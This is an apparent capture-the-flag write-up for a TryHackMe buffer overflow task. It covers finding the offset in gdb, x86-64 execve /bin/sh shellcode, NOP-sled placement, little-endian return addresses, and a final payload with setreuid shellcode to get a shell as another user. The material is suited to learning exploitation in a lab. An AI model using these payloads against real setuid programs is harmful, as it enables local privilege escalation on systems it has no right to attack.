Skip to content

THM - Buffer Overflow - T9

Finding the offset

gdb buffer-overflow-2
(gdb) run $(python -c "print('A'*165)") #--> 0x0000000000004141
(gdb) run $(python -c "print('A'*166)") #--> 0x0000000000414141
(gdb) run $(python -c "print('A'*167)") #--> 0x0000000041414141
(gdb) run $(python -c "print('A'*168)") #--> 0x0000004141414141
(gdb) run $(python -c "print('A'*169)") #--> 0x0000414141414141

169 is the right amount, which override perfectly the return address with 6 bytes.

So we know that with 169 bytes we override the 6-bytes-long return address. It means our offset to reach the start of the return address is 169-6 = 163

Picking a shell code

\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05

This shell code is 40 bytes

Finding the address of the shell code

Our payload will be 169 bytes in total : 163 to fill the buffer and 6 to override the return address pointing to the address of the shell code in the buffer.

PAYLOAD = JUNK(100 bytes) + SHELL CODE (40 bytes) + JUNK (23 byes) + RETURN ADDRESS (6 bytes).

Let's fill the junk with 'A's for now, and our return address with 6*'B'

gdb buffer-overflow
(gdb) run $(python -c "print 'A'*100+'\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A'*23 + 'B'*6")
--> 0x0000424242424242

We will now examine the dump of the hex code with the command x/100x $rsp-200 which dumps 100*4 bytes from memory location $rsp -200 bytes.

(gdb) x/100x $rsp-200
0x7fffffffe8c8: 0x004005a9      0x00000000      0xf7ffa268      0x00007fff
0x7fffffffe8d8: 0xffffecea      0x00007fff      0x67676f64      0x4141416f
0x7fffffffe8e8: 0x41414141(!)   0x41414141      0x41414141      0x41414141 <--- start of the buffer
0x7fffffffe8f8: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe908: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe918: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe928: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe938: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe948: 0x583b6a41(!)   0x49d23148      0x622f2fb8      0x732f6e69 <--- start of the shellcode
0x7fffffffe958: 0xe8c14968      0x48504108      0x5752e789      0x0fe68948
0x7fffffffe968: 0x583c6a05      0x0fff3148      0x41414105      0x41414141

NOPs

Instead of filling the junk before the shell code with 'A' we fill it with NOPs (\x90).

gdb buffer-overflow
(gdb) run $(python -c "print '\x90'*100+'\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A'*23 + 'B'*6")
(gdb) x/100x $rsp-200
0x7fffffffe8c8: 0x004005a9      0x00000000      0xf7ffa268      0x00007fff
0x7fffffffe8d8: 0xffffecea      0x00007fff      0x67676f64      0x9090906f
0x7fffffffe8e8: 0x90909090(!)   0x90909090      0x90909090      0x90909090 <----- Nops start here
0x7fffffffe8f8: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe908: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe918: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe928: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe938: 0x90909090(!)   0x90909090      0x90909090      0x90909090 <----- The address I pic
0x7fffffffe948: 0x583b6a90(!)   0x49d23148      0x622f2fb8      0x732f6e69 <----- shellcode
0x7fffffffe958: 0xe8c14968      0x48504108      0x5752e789      0x0fe68948
0x7fffffffe968: 0x583c6a05      0x0fff3148      0x41414105      0x41414141

You can now just pick any address as long as its in the NOPS, I'll pick 0x7fffffffe938

We need to convert it to little endian: 0x7fffffffe938 becomes 0x38e9ffffff7f and eventually \x38\xe9\xff\xff\xff\x7f

Shell test with correct return address

./buffer-overflow-2 $(python -c "print '\x90'*100+'\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A'*23 + '\x38\xe9\xff\xff\xff\x7f'")

we have shell but not as user3

Shellcode with setreuid

cat /etc/passwd
user3:x:1003:1003::/home/user3:/bin/bash

1003 = user3 UUID

Adjust shellcode

Install tool

apt-get update
apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools

Create shellcode prefix

pwn shellcraft -f d amd64.linux.setreuid 1003
\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05

14 bytes

New shellcode

./buffer-overflow-2 $(python -c "print '\x90'*86+'\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A'*23 + '\x38\xe9\xff\xff\xff\x7f'")